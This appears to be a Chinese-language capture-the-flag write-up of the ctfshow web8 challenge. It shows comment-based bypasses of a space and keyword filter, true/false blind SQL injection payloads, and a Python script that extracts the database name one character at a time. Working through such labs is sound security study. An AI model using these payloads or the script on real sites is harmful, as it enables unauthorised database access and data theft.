ctfshowWP
今后有关ctfshow的解题都会在这里 ctfshow web8 sql注入,不过过滤了很多东西,常见的and,union空格 但依旧可以通过 GET /index.php?id=2/**/or/**/true# GET /index.php?id=2/**/or/**/false# 来判断真假来注入 需要使用盲注,函数为ascii,原理就是比对 or/**/ascii(substr(database()from/**/1/**/for/**/1))=ascii(substr(database()from/**/1/**/for/**/1))%23 截取当前数据库的第一个字符,比对第一个字符,返回很多文章,证明是true,成功 查询当前数据库的代码 import requests def check_id(id_value, position): # position 递增 url = f"https://df8032cd-0662-449d-bb7d-7ccd15eb9c62.challenge.ctf.show/index.php?id=-1/**/or/**/ascii(substr(database()from/**/{position}/**/for/**/1))={id_value}#" response = requests.get(url, verify=False) # 长度大于 403 ASCII if len(response.content) > 403: ascii_value = chr(id_value) return ascii_value return None def main(): inp = "" position = 1 # 查询位置 while position <= 5: for i in range(0, 128): # 遍历ascii result = check_id(i, position) if result is not None: inp += result print(f"Position: {position}, ASCII: {result}") position += 1 break print(f"Final input: {inp}") if __name__ == "__main__": main() 查询到数据库名称为web8 ...